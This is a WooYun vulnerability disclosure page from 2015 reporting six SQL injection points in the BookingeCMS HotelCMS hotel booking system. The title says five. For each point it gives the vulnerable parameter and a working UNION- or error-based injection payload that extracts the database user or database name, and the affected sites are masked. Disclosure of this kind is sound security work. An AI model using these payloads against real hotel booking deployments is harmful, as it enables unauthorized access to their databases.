当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0137378
漏洞标题:
BookingeCMS HotelCMS酒店预订管理系统SQL注入5枚
相关厂商:
珠海中新信息科技有限公司
漏洞作者:
路人甲
提交时间:
2015-09-04 13:33
修复时间:
2015-12-06 09:00
公开时间:
2015-12-06 09:00
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向第三方安全合作伙伴开放
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开

简要描述:

另外6枚咯~

详细说明:

  珠海中新信息科技有限公司开发的BookingeCMS HotelCMS存在多个SQL注入,前面有人xfkxfk提交过这个公司的KTVCMS。与现在提交的系统漏洞不一样。
相关产品:

01.png


SQL Injection:
GET:

1、/?m=info&rewrite=1                                 rewrite参数存在注入
2、/?m=login.checkAccount&account=                    account参数存在注入


POST:

3、/?m=hotel.setSearchSession  
POST数据:type=getCityId&cityName=珠海&hotelName=&indate=2015-08-26&outdate=2015-08-29                                                               
注意:第三处注入需不带cookie注入;否则一直都是提示报错           cityName参数存在注入
4、/?m=hotel.getHotelInfo
POST数据:hotelId=1                                    hotelId参数存在注入 
                          
5、/?m=login.check                                   
POST数据:account=test'&password=123456                account参数存在注入
6、/?m=city.getCity 
POST数据:provinceId=2200&pageSize=0&json=true         provinceId参数存在注入


Case:

mask 区域 
1.http://**.**.**/_
2.http://**.**.**/_
3.http://**.**.**/_
4.http://**.**.**/bg/_
5.http://**.**.**/_
6.http://**.**.**/_
7.http://**.**.**/_
8.http://**.**.**/_
9.http://**.**.**/_
10.http://**.**.**/_
11.http://**.**.**/

漏洞证明:

Security Testing:
安全测试SQL注入漏洞,测试注入user()、或者database()
注:不排除有小部分站点有安全狗或者其它情况。

1、测试Payload:
?m=info&rewrite=1' UNION ALL SELECT CONCAT(0x7c,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x7c),NULL%23
02.png




2、测试Payload:
/?m=login.checkAccount&account= ' AND (SELECT 9468 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uNGB'='uNGB



03.png




3、测试Payload:
cityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND (SELECT 4965 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&indate=2015-08-27&outdate=2015-08-30&address=&hotelName=1



04.png




4、测试Payload:
hotelId=11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



05.png




5、测试Payload:
account=test' AND (SELECT 1345 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wuaQ'='wuaQ&password=123456 



06.png




6、测试Payload:
provinceId=1' AND (SELECT 7525 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOvh'='IOvh&pageSize=0&json=true



07.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-07 08:58

厂商回复:

暂未建立与软件生产厂商的直接处置渠道,待认领.

最新状态:

暂无